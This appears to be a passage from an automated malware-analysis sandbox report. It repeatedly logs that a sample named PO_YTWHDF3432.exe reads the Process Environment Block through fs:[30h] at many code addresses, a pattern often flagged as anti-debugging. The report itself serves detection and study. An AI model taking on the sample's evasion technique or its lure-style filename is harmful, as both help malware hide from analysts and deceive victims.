            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_0195E1D0 mov eax, dword ptr fs:[00000030h]3_2_0195E1D0
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_019A61C3 mov eax, dword ptr fs:[00000030h]3_2_019A61C3
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_019A61C3 mov eax, dword ptr fs:[00000030h]3_2_019A61C3
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_019101F8 mov eax, dword ptr fs:[00000030h]3_2_019101F8
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_019B61E5 mov eax, dword ptr fs:[00000030h]3_2_019B61E5
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_0198A118 mov ecx, dword ptr fs:[00000030h]3_2_0198A118
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_0198A118 mov eax, dword ptr fs:[00000030h]3_2_0198A118
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_0198A118 mov eax, dword ptr fs:[00000030h]3_2_0198A118
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_0198A118 mov eax, dword ptr fs:[00000030h]3_2_0198A118
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_019A0115 mov eax, dword ptr fs:[00000030h]3_2_019A0115
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_0198E10E mov eax, dword ptr fs:[00000030h]3_2_0198E10E
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_0198E10E mov ecx, dword ptr fs:[00000030h]3_2_0198E10E
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_0198E10E mov eax, dword ptr fs:[00000030h]3_2_0198E10E
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_0198E10E mov eax, dword ptr fs:[00000030h]3_2_0198E10E
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_0198E10E mov ecx, dword ptr fs:[00000030h]3_2_0198E10E
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_0198E10E mov eax, dword ptr fs:[00000030h]3_2_0198E10E
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_0198E10E mov eax, dword ptr fs:[00000030h]3_2_0198E10E
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_0198E10E mov ecx, dword ptr fs:[00000030h]3_2_0198E10E
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_0198E10E mov eax, dword ptr fs:[00000030h]3_2_0198E10E
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_0198E10E mov ecx, dword ptr fs:[00000030h]3_2_0198E10E
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_01910124 mov eax, dword ptr fs:[00000030h]3_2_01910124
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_01978158 mov eax, dword ptr fs:[00000030h]3_2_01978158
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_01974144 mov eax, dword ptr fs:[00000030h]3_2_01974144
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_01974144 mov eax, dword ptr fs:[00000030h]3_2_01974144
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_01974144 mov ecx, dword ptr fs:[00000030h]3_2_01974144
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_01974144 mov eax, dword ptr fs:[00000030h]3_2_01974144
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_01974144 mov eax, dword ptr fs:[00000030h]3_2_01974144
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_018E6154 mov eax, dword ptr fs:[00000030h]3_2_018E6154
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_018E6154 mov eax, dword ptr fs:[00000030h]3_2_018E6154
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_018DC156 mov eax, dword ptr fs:[00000030h]3_2_018DC156
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_018E208A mov eax, dword ptr fs:[00000030h]3_2_018E208A
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_019A60B8 mov eax, dword ptr fs:[00000030h]3_2_019A60B8
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_019A60B8 mov ecx, dword ptr fs:[00000030h]3_2_019A60B8
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_019780A8 mov eax, dword ptr fs:[00000030h]3_2_019780A8
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_019620DE mov eax, dword ptr fs:[00000030h]3_2_019620DE
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_019220F0 mov ecx, dword ptr fs:[00000030h]3_2_019220F0
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_018E80E9 mov eax, dword ptr fs:[00000030h]3_2_018E80E9
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_018DA0E3 mov ecx, dword ptr fs:[00000030h]3_2_018DA0E3
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_019660E0 mov eax, dword ptr fs:[00000030h]3_2_019660E0
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_018DC0F0 mov eax, dword ptr fs:[00000030h]3_2_018DC0F0
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_01964000 mov ecx, dword ptr fs:[00000030h]3_2_01964000
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_01982000 mov eax, dword ptr fs:[00000030h]3_2_01982000
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_01982000 mov eax, dword ptr fs:[00000030h]3_2_01982000
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_01982000 mov eax, dword ptr fs:[00000030h]3_2_01982000
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_01982000 mov eax, dword ptr fs:[00000030h]3_2_01982000
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_01982000 mov eax, dword ptr fs:[00000030h]3_2_01982000
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_01982000 mov eax, dword ptr fs:[00000030h]3_2_01982000
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_01982000 mov eax, dword ptr fs:[00000030h]3_2_01982000
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_01982000 mov eax, dword ptr fs:[00000030h]3_2_01982000
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_018FE016 mov eax, dword ptr fs:[00000030h]3_2_018FE016
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_018FE016 mov eax, dword ptr fs:[00000030h]3_2_018FE016
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_018FE016 mov eax, dword ptr fs:[00000030h]3_2_018FE016
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_018FE016 mov eax, dword ptr fs:[00000030h]3_2_018FE016
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_01976030 mov eax, dword ptr fs:[00000030h]3_2_01976030
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_018DA020 mov eax, dword ptr fs:[00000030h]3_2_018DA020
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_018DC020 mov eax, dword ptr fs:[00000030h]3_2_018DC020
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_01966050 mov eax, dword ptr fs:[00000030h]3_2_01966050
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_018E2050 mov eax, dword ptr fs:[00000030h]3_2_018E2050
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_0190C073 mov eax, dword ptr fs:[00000030h]3_2_0190C073
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_018DE388 mov eax, dword ptr fs:[00000030h]3_2_018DE388
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_018DE388 mov eax, dword ptr fs:[00000030h]3_2_018DE388
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_018DE388 mov eax, dword ptr fs:[00000030h]3_2_018DE388
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_018D8397 mov eax, dword ptr fs:[00000030h]3_2_018D8397
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_018D8397 mov eax, dword ptr fs:[00000030h]3_2_018D8397
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_018D8397 mov eax, dword ptr fs:[00000030h]3_2_018D8397
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_0190438F mov eax, dword ptr fs:[00000030h]3_2_0190438F
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_0190438F mov eax, dword ptr fs:[00000030h]3_2_0190438F
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_0198E3DB mov eax, dword ptr fs:[00000030h]3_2_0198E3DB
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_0198E3DB mov eax, dword ptr fs:[00000030h]3_2_0198E3DB
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_0198E3DB mov ecx, dword ptr fs:[00000030h]3_2_0198E3DB
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_0198E3DB mov eax, dword ptr fs:[00000030h]3_2_0198E3DB
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_019843D4 mov eax, dword ptr fs:[00000030h]3_2_019843D4
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_019843D4 mov eax, dword ptr fs:[00000030h]3_2_019843D4
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_018EA3C0 mov eax, dword ptr fs:[00000030h]3_2_018EA3C0
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_018EA3C0 mov eax, dword ptr fs:[00000030h]3_2_018EA3C0
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_018EA3C0 mov eax, dword ptr fs:[00000030h]3_2_018EA3C0
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_018EA3C0 mov eax, dword ptr fs:[00000030h]3_2_018EA3C0
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_018EA3C0 mov eax, dword ptr fs:[00000030h]3_2_018EA3C0
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_018EA3C0 mov eax, dword ptr fs:[00000030h]3_2_018EA3C0
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_018E83C0 mov eax, dword ptr fs:[00000030h]3_2_018E83C0
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_018E83C0 mov eax, dword ptr fs:[00000030h]3_2_018E83C0
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_018E83C0 mov eax, dword ptr fs:[00000030h]3_2_018E83C0
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_018E83C0 mov eax, dword ptr fs:[00000030h]3_2_018E83C0
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_0199C3CD mov eax, dword ptr fs:[00000030h]3_2_0199C3CD
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_018F03E9 mov eax, dword ptr fs:[00000030h]3_2_018F03E9
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_018F03E9 mov eax, dword ptr fs:[00000030h]3_2_018F03E9
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_018F03E9 mov eax, dword ptr fs:[00000030h]3_2_018F03E9
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_018F03E9 mov eax, dword ptr fs:[00000030h]3_2_018F03E9
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_018F03E9 mov eax, dword ptr fs:[00000030h]3_2_018F03E9
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_018F03E9 mov eax, dword ptr fs:[00000030h]3_2_018F03E9
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_018F03E9 mov eax, dword ptr fs:[00000030h]3_2_018F03E9
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_018F03E9 mov eax, dword ptr fs:[00000030h]3_2_018F03E9
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_019163FF mov eax, dword ptr fs:[00000030h]3_2_019163FF
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_018FE3F0 mov eax, dword ptr fs:[00000030h]3_2_018FE3F0
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_018FE3F0 mov eax, dword ptr fs:[00000030h]3_2_018FE3F0
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_018FE3F0 mov eax, dword ptr fs:[00000030h]3_2_018FE3F0
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_01900310 mov ecx, dword ptr fs:[00000030h]3_2_01900310
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_0191A30B mov eax, dword ptr fs:[00000030h]3_2_0191A30B
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_0191A30B mov eax, dword ptr fs:[00000030h]3_2_0191A30B
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_0191A30B mov eax, dword ptr fs:[00000030h]3_2_0191A30B
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_018DC310 mov ecx, dword ptr fs:[00000030h]3_2_018DC310
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_019AA352 mov eax, dword ptr fs:[00000030h]3_2_019AA352
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_01988350 mov ecx, dword ptr fs:[00000030h]3_2_01988350
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_0196035C mov eax, dword ptr fs:[00000030h]3_2_0196035C
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_0196035C mov eax, dword ptr fs:[00000030h]3_2_0196035C
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_0196035C mov eax, dword ptr fs:[00000030h]3_2_0196035C
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_0196035C mov ecx, dword ptr fs:[00000030h]3_2_0196035C
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_0196035C mov eax, dword ptr fs:[00000030h]3_2_0196035C
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_0196035C mov eax, dword ptr fs:[00000030h]3_2_0196035C
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_01962349 mov eax, dword ptr fs:[00000030h]3_2_01962349
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_01962349 mov eax, dword ptr fs:[00000030h]3_2_01962349
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_01962349 mov eax, dword ptr fs:[00000030h]3_2_01962349
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_01962349 mov eax, dword ptr fs:[00000030h]3_2_01962349
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_01962349 mov eax, dword ptr fs:[00000030h]3_2_01962349
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_01962349 mov eax, dword ptr fs:[00000030h]3_2_01962349
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_01962349 mov eax, dword ptr fs:[00000030h]3_2_01962349
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_01962349 mov eax, dword ptr fs:[00000030h]3_2_01962349
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_01962349 mov eax, dword ptr fs:[00000030h]3_2_01962349
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_01962349 mov eax, dword ptr fs:[00000030h]3_2_01962349
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_01962349 mov eax, dword ptr fs:[00000030h]3_2_01962349
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_01962349 mov eax, dword ptr fs:[00000030h]3_2_01962349
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_01962349 mov eax, dword ptr fs:[00000030h]3_2_01962349
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_01962349 mov eax, dword ptr fs:[00000030h]3_2_01962349
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_01962349 mov eax, dword ptr fs:[00000030h]3_2_01962349
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_0198437C mov eax, dword ptr fs:[00000030h]3_2_0198437C
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_01960283 mov eax, dword ptr fs:[00000030h]3_2_01960283
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_01960283 mov eax, dword ptr fs:[00000030h]3_2_01960283
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_01960283 mov eax, dword ptr fs:[00000030h]3_2_01960283
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_0191E284 mov eax, dword ptr fs:[00000030h]3_2_0191E284
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_0191E284 mov eax, dword ptr fs:[00000030h]3_2_0191E284
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_018F02A0 mov eax, dword ptr fs:[00000030h]3_2_018F02A0
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_018F02A0 mov eax, dword ptr fs:[00000030h]3_2_018F02A0
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_019762A0 mov eax, dword ptr fs:[00000030h]3_2_019762A0
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_019762A0 mov ecx, dword ptr fs:[00000030h]3_2_019762A0
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_019762A0 mov eax, dword ptr fs:[00000030h]3_2_019762A0
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_019762A0 mov eax, dword ptr fs:[00000030h]3_2_019762A0
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_019762A0 mov eax, dword ptr fs:[00000030h]3_2_019762A0
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_019762A0 mov eax, dword ptr fs:[00000030h]3_2_019762A0
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_018EA2C3 mov eax, dword ptr fs:[00000030h]3_2_018EA2C3
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_018EA2C3 mov eax, dword ptr fs:[00000030h]3_2_018EA2C3
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_018EA2C3 mov eax, dword ptr fs:[00000030h]3_2_018EA2C3
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_018EA2C3 mov eax, dword ptr fs:[00000030h]3_2_018EA2C3
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_018EA2C3 mov eax, dword ptr fs:[00000030h]3_2_018EA2C3
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_018F02E1 mov eax, dword ptr fs:[00000030h]3_2_018F02E1
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_018F02E1 mov eax, dword ptr fs:[00000030h]3_2_018F02E1
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_018F02E1 mov eax, dword ptr fs:[00000030h]3_2_018F02E1
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_018D823B mov eax, dword ptr fs:[00000030h]3_2_018D823B
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_0199A250 mov eax, dword ptr fs:[00000030h]3_2_0199A250
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_0199A250 mov eax, dword ptr fs:[00000030h]3_2_0199A250
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_01968243 mov eax, dword ptr fs:[00000030h]3_2_01968243
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_01968243 mov ecx, dword ptr fs:[00000030h]3_2_01968243
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_018E6259 mov eax, dword ptr fs:[00000030h]3_2_018E6259
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_018DA250 mov eax, dword ptr fs:[00000030h]3_2_018DA250
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_018D826B mov eax, dword ptr fs:[00000030h]3_2_018D826B
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_01990274 mov eax, dword ptr fs:[00000030h]3_2_01990274
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_01990274 mov eax, dword ptr fs:[00000030h]3_2_01990274
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_01990274 mov eax, dword ptr fs:[00000030h]3_2_01990274
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_01990274 mov eax, dword ptr fs:[00000030h]3_2_01990274
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_01990274 mov eax, dword ptr fs:[00000030h]3_2_01990274
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_01990274 mov eax, dword ptr fs:[00000030h]3_2_01990274
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_01990274 mov eax, dword ptr fs:[00000030h]3_2_01990274
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_01990274 mov eax, dword ptr fs:[00000030h]3_2_01990274
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_01990274 mov eax, dword ptr fs:[00000030h]3_2_01990274
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_01990274 mov eax, dword ptr fs:[00000030h]3_2_01990274
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_01990274 mov eax, dword ptr fs:[00000030h]3_2_01990274
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_01990274 mov eax, dword ptr fs:[00000030h]3_2_01990274
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_018E4260 mov eax, dword ptr fs:[00000030h]3_2_018E4260
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_018E4260 mov eax, dword ptr fs:[00000030h]3_2_018E4260
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_018E4260 mov eax, dword ptr fs:[00000030h]3_2_018E4260
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_018E2582 mov eax, dword ptr fs:[00000030h]3_2_018E2582
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_018E2582 mov ecx, dword ptr fs:[00000030h]3_2_018E2582
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_0191E59C mov eax, dword ptr fs:[00000030h]3_2_0191E59C
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_01914588 mov eax, dword ptr fs:[00000030h]3_2_01914588
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_019045B1 mov eax, dword ptr fs:[00000030h]3_2_019045B1
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_019045B1 mov eax, dword ptr fs:[00000030h]3_2_019045B1
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_019605A7 mov eax, dword ptr fs:[00000030h]3_2_019605A7
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_019605A7 mov eax, dword ptr fs:[00000030h]3_2_019605A7
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_019605A7 mov eax, dword ptr fs:[00000030h]3_2_019605A7
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_0191A5D0 mov eax, dword ptr fs:[00000030h]3_2_0191A5D0
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_0191A5D0 mov eax, dword ptr fs:[00000030h]3_2_0191A5D0
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_0191E5CF mov eax, dword ptr fs:[00000030h]3_2_0191E5CF
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_0191E5CF mov eax, dword ptr fs:[00000030h]3_2_0191E5CF
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_018E65D0 mov eax, dword ptr fs:[00000030h]3_2_018E65D0
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_018E25E0 mov eax, dword ptr fs:[00000030h]3_2_018E25E0
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_0190E5E7 mov eax, dword ptr fs:[00000030h]3_2_0190E5E7
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_0190E5E7 mov eax, dword ptr fs:[00000030h]3_2_0190E5E7
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_0190E5E7 mov eax, dword ptr fs:[00000030h]3_2_0190E5E7
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_0190E5E7 mov eax, dword ptr fs:[00000030h]3_2_0190E5E7
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_0190E5E7 mov eax, dword ptr fs:[00000030h]3_2_0190E5E7
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_0190E5E7 mov eax, dword ptr fs:[00000030h]3_2_0190E5E7
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_0190E5E7 mov eax, dword ptr fs:[00000030h]3_2_0190E5E7
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_0190E5E7 mov eax, dword ptr fs:[00000030h]3_2_0190E5E7
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_0191C5ED mov eax, dword ptr fs:[00000030h]3_2_0191C5ED
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_0191C5ED mov eax, dword ptr fs:[00000030h]3_2_0191C5ED
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_01976500 mov eax, dword ptr fs:[00000030h]3_2_01976500
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_019B4500 mov eax, dword ptr fs:[00000030h]3_2_019B4500
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_019B4500 mov eax, dword ptr fs:[00000030h]3_2_019B4500
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_019B4500 mov eax, dword ptr fs:[00000030h]3_2_019B4500
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_019B4500 mov eax, dword ptr fs:[00000030h]3_2_019B4500
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_019B4500 mov eax, dword ptr fs:[00000030h]3_2_019B4500
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_019B4500 mov eax, dword ptr fs:[00000030h]3_2_019B4500
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_019B4500 mov eax, dword ptr fs:[00000030h]3_2_019B4500
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_0190E53E mov eax, dword ptr fs:[00000030h]3_2_0190E53E
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_0190E53E mov eax, dword ptr fs:[00000030h]3_2_0190E53E
